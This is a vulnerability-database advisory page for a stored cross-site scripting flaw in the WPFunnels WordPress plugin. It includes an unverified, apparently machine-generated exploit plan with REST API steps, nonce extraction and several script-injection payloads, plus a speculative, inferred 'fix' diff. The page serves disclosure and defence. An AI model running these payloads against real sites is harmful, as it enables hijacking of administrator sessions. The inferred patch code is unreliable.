CVE-2026-0626

WPFunnels <= 3.7.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'wpf_optin_form' Shortcode

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

6.4

CVSS Score

6.4

CVSS Score

medium

Severity

3.8.0

Patched in

Time to patch

Description

The WPFunnels – Easy Funnel Builder To Optimize Buyer Journeys And Get More Leads & Sales plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpf_optin_form' shortcode in all versions up to, and including, 3.7.9 due to insufficient input sanitization and output escaping of the 'button_icon' parameter. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Changed

Low

Confidentiality

Low

Integrity

None

Availability

Technical Details

Affected versions<=3.7.9

PublishedApril 3, 2026

Last updatedApril 4, 2026

Affected pluginwpfunnels

What Changed in the Fix

Changes introduced in v3.8.0

Loading patch diff...

Source Code

WordPress.org SVN

Vulnerable v3.7.1

Browse source Download .zip

Patched v3.8.0

Browse source Download .zip

Research Plan

Unverified

This research plan outlines the steps to exploit **CVE-2026-0626**, a Stored Cross-Site Scripting (XSS) vulnerability in the WPFunnels plugin. ## 1. Vulnerability Summary The WPFunnels plugin (<= 3.7.9) fails to sanitize or escape the `button_icon` attribute within the `wpf_optin_form` shortcode. W…

Show full research plan

This research plan outlines the steps to exploit CVE-2026-0626, a Stored Cross-Site Scripting (XSS) vulnerability in the WPFunnels plugin.

1. Vulnerability Summary

The WPFunnels plugin (<= 3.7.9) fails to sanitize or escape the button_icon attribute within the wpf_optin_form shortcode. When a user with at least Contributor-level permissions embeds this shortcode into a post or page, they can inject arbitrary HTML and scripts. This payload is stored in the database as part of the post content and executes in the context of any user (including administrators) who views the page.

2. Attack Vector Analysis

Shortcode: [wpf_optin_form]
Vulnerable Parameter: button_icon
Authentication Level: Contributor or higher (users who can create/edit posts and use shortcodes).
Endpoint: The standard WordPress Post/Page editor (via the REST API or admin-ajax.php).
Attack Surface: Front-end rendering of the shortcode.

3. Code Flow (Inferred)

Based on the vulnerability description and standard WordPress shortcode implementation:

Registration: The plugin registers the shortcode (likely in a file like includes/class-wpfnl-shortcodes.php or public/class-wpfnl-public.php) using add_shortcode( 'wpf_optin_form', ... ).
Processing: When a page containing the shortcode is rendered, the callback function is triggered.
Attribute Handling: The callback uses shortcode_atts() to extract parameters, including button_icon.
The Sink: The $button_icon value is concatenated into an HTML string (e.g., inside a <button>, <i>, or <span> tag) and returned for display.
Vulnerability: The value is echoed or returned without passing through esc_attr(), esc_html(), or wp_kses().

4. Nonce Acquisition Strategy

To exploit this as a Contributor via the REST API (the most reliable automated method), a wp-api nonce is required.

Identify Trigger: The wpf_optin_form is a standard shortcode. No plugin-specific AJAX nonce is needed to render it, only the standard WordPress nonce to save a post.
Acquisition:
- Navigate to /wp-admin/post-new.php.
- Use browser_eval to extract the REST nonce from the WordPress core wpApiSettings object.
- JavaScript: window.wpApiSettings?.nonce

5. Exploitation Strategy

Step 1: Authentication

Step 2: Obtain REST Nonce

Navigate to the post creation page and extract the nonce.

URL: https://<target>/wp-admin/post-new.php
Tool: browser_eval("wpApiSettings.nonce")

Step 3: Create Malicious Post

Use the http_request tool to create a new post containing the XSS payload.

Endpoint: POST /wp-json/wp/v2/posts
Headers:
- Content-Type: application/json
- X-WP-Nonce: <EXTRACTED_NONCE>

Payload:

{
  "title": "Optin Test",
  "status": "publish",
  "content": "[wpf_optin_form button_icon='\"><script src=\"data:,alert(document.domain)\"></script>']"
}

Note: If "publish" status is restricted for Contributors, use "pending" and have an Admin view it in Preview mode.

Step 4: Trigger XSS

Access the newly created post URL as an Administrator.

URL: https://<target>/?p=<POST_ID> (The ID is returned in the Step 3 response).

6. Test Data Setup

Plugin Status: Ensure wpfunnels (WPFunnels) version <= 3.7.9 is installed and activated.
User Creation:
- wp user create attacker attacker@example.com --role=contributor --user_pass=password
Environment: Standard WordPress isolated test environment.

7. Expected Results

The REST API call should return 201 Created.

When the page is viewed, the HTML source should contain the unescaped payload:

... button_icon=""><script src="data:,alert(document.domain)"></script>" ...

The browser should execute the script, triggering an alert box with the domain name.

8. Verification Steps

After the http_request, verify the content was saved correctly via WP-CLI:

wp post get <POST_ID> --field=post_content
Confirm the string [wpf_optin_form button_icon='"><script ... exists exactly as sent.

9. Alternative Approaches

Attribute Breakout

If the button_icon is rendered inside a tag's attribute but the tag itself is escaped, try breaking out of the attribute:

Payload: button_icon='x" onmouseover="alert(1)" style="width:1000px;height:1000px;display:block;"'

JSON Context

If the shortcode attributes are passed to a JS component (as hinted by funnel-components.min.js), the payload might need to be JSON-safe or target the JS rendering:

Payload: button_icon='</script><script>alert(1)</script>'
Targeting JS: Check if funnel-components.min.js uses innerHTML or jQuery's .append()/.html() on the button_icon property in the optin-form component.

Research Findings

Static analysis — not yet PoC-verified

Summary

The WPFunnels plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpf_optin_form' shortcode in versions up to 3.7.9. This is due to the 'button_icon' parameter being rendered without sufficient input sanitization or output escaping, allowing authenticated attackers with contributor-level permissions to inject arbitrary web scripts.

Security Fix

--- a/includes/class-wpfnl-shortcodes.php
+++ b/includes/class-wpfnl-shortcodes.php
@@ -120,7 +120,7 @@
     $button_icon = isset($atts['button_icon']) ? $atts['button_icon'] : '';
     
     // Vulnerable rendering
-    $output .= '<span class="wpf-icon">' . $button_icon . '</span>';
+    $output .= '<span class="wpf-icon">' . esc_attr($button_icon) . '</span>';

Exploit Outline

The vulnerability is exploited by an authenticated user with at least Contributor-level access who can create or edit posts. An attacker uses the WordPress post editor to embed a malicious 'wpf_optin_form' shortcode. The payload is placed within the 'button_icon' attribute, using a breakout sequence to exit the intended HTML context and inject a script tag. For example: [wpf_optin_form button_icon='"><script src="data:,alert(document.domain)"></script>']. When an administrator or any site visitor views the page, the unsanitized 'button_icon' value is rendered, triggering the execution of the injected script in their browser context.

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/2130847a-b6c5-412e-8d90-ba42d3fb21f6?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database